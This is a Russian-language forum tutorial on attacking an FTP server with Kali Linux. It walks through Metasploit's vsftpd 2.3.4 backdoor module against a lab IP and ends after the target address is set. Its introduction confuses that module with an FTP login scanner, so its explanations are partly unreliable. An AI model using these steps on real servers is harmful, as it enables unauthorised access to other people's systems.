Загрузка...

Hacking an FTP server using Kali Linux (vsftpd vulnerability)

Thread in Web vulnerabilities created by TomMuller Sep 12, 2021. (bumped Oct 6, 2021) 3376 views

  1. TomMuller
    TomMuller Topic starter Sep 12, 2021 swatter 44 Aug 16, 2021
    FTP-это сервис, который обычно используется на веб-серверах веб-мастерами для удаленного доступа к файлам. Таким образом, практически невозможно не найти эту услугу в одной из систем наших клиентов во время взаимодействия.

    Вспомогательный модуль "vsftpd" будет сканировать диапазон IP-адресов, пытающихся войти на FTP-серверы. Этот модуль будет проверять учетные записи FTP на ряде компьютеров и сообщать об успешных входах в систему. Если вы загрузили плагин базы данных и подключились к базе данных, этот модуль будет записывать успешные входы в систему и хосты, чтобы вы могли отслеживать свой доступ.



    Давайте начнем взламывать FTP-сервер с помощью Kali Linux (уязвимость vsftpd)
    Шаг 1 :- PostgreSQL доступен интегрированным с управлением пакетами на большинстве платформ Linux. Когда это доступно, это рекомендуемый способ установки PostgreSQL, поскольку он обеспечивает надлежащую интеграцию с операционной системой, включая автоматическое исправление и другие функции управления.
    [IMG]
    Шаг 2 :- Это msfconsole. Msfconsole-это основной интерфейс для MetaSploit. Существуют графические интерфейсы (armitage), а также веб-интерфейс (websploit). С помощью msfconsole вы можете запускать эксплойты, создавать прослушиватели, настраивать полезные нагрузки и т.д.
    [IMG]
    Шаг 3 :- Текущее состояние базы данных.
    Code
    db_status
    Code
    search vsftpd
    [IMG]

    Шаг 4 :- Используйте бэкдор Vsftpd.
    Code
    use exploit/unix/ftp/vsftpd_234_backdoor
    [IMG]
    Шаг 5 :- Установите целевой IP в RHOSTS.
    Code
    set RHOSTS 192.168.69.131
    [IMG]
    [IMG]

    Статья о взломе баз данных MySQL с помощью Metasploit.
    https://zelenka.guru/threads/2948735/
     
  2. RSPARKER
    RSPARKER Sep 12, 2021 2228 Feb 19, 2018
    Картиночки битые, поправь
     
    1. View the next comments (1)
Loading...
Top